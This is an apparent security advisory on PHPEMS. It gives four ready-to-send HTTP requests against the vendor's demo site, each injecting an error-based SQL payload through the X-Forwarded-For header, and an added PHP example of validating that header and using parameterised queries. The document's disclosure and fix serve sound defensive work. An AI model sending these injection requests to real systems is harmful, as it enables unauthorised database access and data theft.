### Summary:

Code audit: four injection points in the PHPEMS front end (demonstrated on the official demo site)

### Details:

Official site: http://phpems.net

Official demo site: http://phpems.net/2014

The analysis is shown in the figure below:

[![phpems.png](https://images.seebug.org/upload/201503/202051515b09bb5cded373e64fa69f01d4f07307.png)](https://images.seebug.org/upload/201503/202051515b09bb5cded373e64fa69f01d4f07307.png)

### Proof of vulnerability:

Proof:

The cookie must be cleared first; this is a condition in the code.

1. http://phpems.net/2014//index.php?exam-api-login

```http
GET /2014//index.php?exam-api-login HTTP/1.1
Host: phpems.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
X-Forwarded-For: 8.8.8.8' and extractvalue(1, concat(0x7e, (select version()),0x7e)))#
Connection: keep-alive
```

[![1.jpg](https://images.seebug.org/upload/201503/20205323e95d8b9d19af8bef5a58268788e9e900.jpg)](https://images.seebug.org/upload/201503/20205323e95d8b9d19af8bef5a58268788e9e900.jpg)

2. http://phpems.net/2014//index.php?user-master-user

```http
GET /2014//index.php?user-master-user HTTP/1.1
Host: phpems.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
X-Forwarded-For: 8.8.8.8' and extractvalue(1, concat(0x7e, (select version()),0x7e)))#
Connection: keep-alive
```

[![2.jpg](https://images.seebug.org/upload/201503/20205342e6a3132cfb8d32397895464d949b7e20.jpg)](https://images.seebug.org/upload/201503/20205342e6a3132cfb8d32397895464d949b7e20.jpg)

3. http://phpems.net/2014//index.php?user-phone-register

```http
GET /2014//index.php?user-phone-register HTTP/1.1
Host: phpems.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
X-Forwarded-For: 8.8.8.8' and extractvalue(1, concat(0x7e, (select version()),0x7e)))#
Connection: keep-alive
```

[![3.jpg](https://images.seebug.org/upload/201503/20205401c0a7c5e377fe478926090ce27406c02f.jpg)](https://images.seebug.org/upload/201503/20205401c0a7c5e377fe478926090ce27406c02f.jpg)

4. http://phpems.net/2014//index.php?document-api-manage

```http
GET /2014//index.php?document-api-manage HTTP/1.1
Host: phpems.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Cookie:
X-Forwarded-For: 8.8.8.8' and extractvalue(1, concat(0x7e, (select version()),0x7e)))#
Connection: keep-alive
```

[![4.jpg](https://images.seebug.org/upload/201503/2020541453baedadb875e21f130bd2b5ec64b391.jpg)](https://images.seebug.org/upload/201503/2020541453baedadb875e21f130bd2b5ec64b391.jpg)
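
An added example of the fix for this class of bug, not taken from PHPEMS or from the original report: it assumes the application derives the client IP from `X-Forwarded-For` and places it in a SQL statement, which is what the four requests above imply. `client_ip()`, `record_session()`, the `demo_session` table and the proxy address `10.0.0.5` are hypothetical names chosen for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical helper, not PHPEMS code. X-Forwarded-For is client-controlled,
// so it is honoured only when the direct peer is a reverse proxy we operate,
// and only when the value parses as an IP address.
function client_ip(array $server, array $trustedProxies): string
{
    $peer = $server['REMOTE_ADDR'] ?? '';
    if (filter_var($peer, FILTER_VALIDATE_IP) === false) {
        throw new RuntimeException('invalid REMOTE_ADDR');
    }
    $xff = $server['HTTP_X_FORWARDED_FOR'] ?? '';
    if ($xff === '' || !in_array($peer, $trustedProxies, true)) {
        return $peer; // header ignored for direct connections
    }
    // Use the rightmost entry, the one appended by our own proxy.
    $hops = array_map('trim', explode(',', $xff));
    $candidate = end($hops);
    return filter_var($candidate, FILTER_VALIDATE_IP) !== false ? $candidate : $peer;
}

// Second layer: the value is bound as a parameter, never concatenated into SQL.
function record_session(PDO $pdo, string $sessionId, string $ip): void
{
    $stmt = $pdo->prepare('INSERT INTO demo_session (id, ip) VALUES (?, ?)');
    $stmt->execute([$sessionId, $ip]);
}

// Constructed demo: in-memory SQLite stands in for the application's database.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE demo_session (id TEXT, ip TEXT)');

// Header value copied from the requests in the report.
$payload = "8.8.8.8' and extractvalue(1, concat(0x7e, (select version()),0x7e)))#";
$cases = [
    'direct client, forged header' => ['REMOTE_ADDR' => '203.0.113.7', 'HTTP_X_FORWARDED_FOR' => $payload],
    'trusted proxy, forged header' => ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => $payload],
    'trusted proxy, clean header'  => ['REMOTE_ADDR' => '10.0.0.5', 'HTTP_X_FORWARDED_FOR' => '198.51.100.23'],
];
foreach ($cases as $label => $server) {
    $ip = client_ip($server, ['10.0.0.5']);
    record_session($pdo, bin2hex(random_bytes(8)), $ip);
    printf("%-30s => %s\n", $label, $ip);
}
```

In both forged cases the stored value is the peer address rather than the header contents; only the clean header behind the trusted proxy yields `198.51.100.23`.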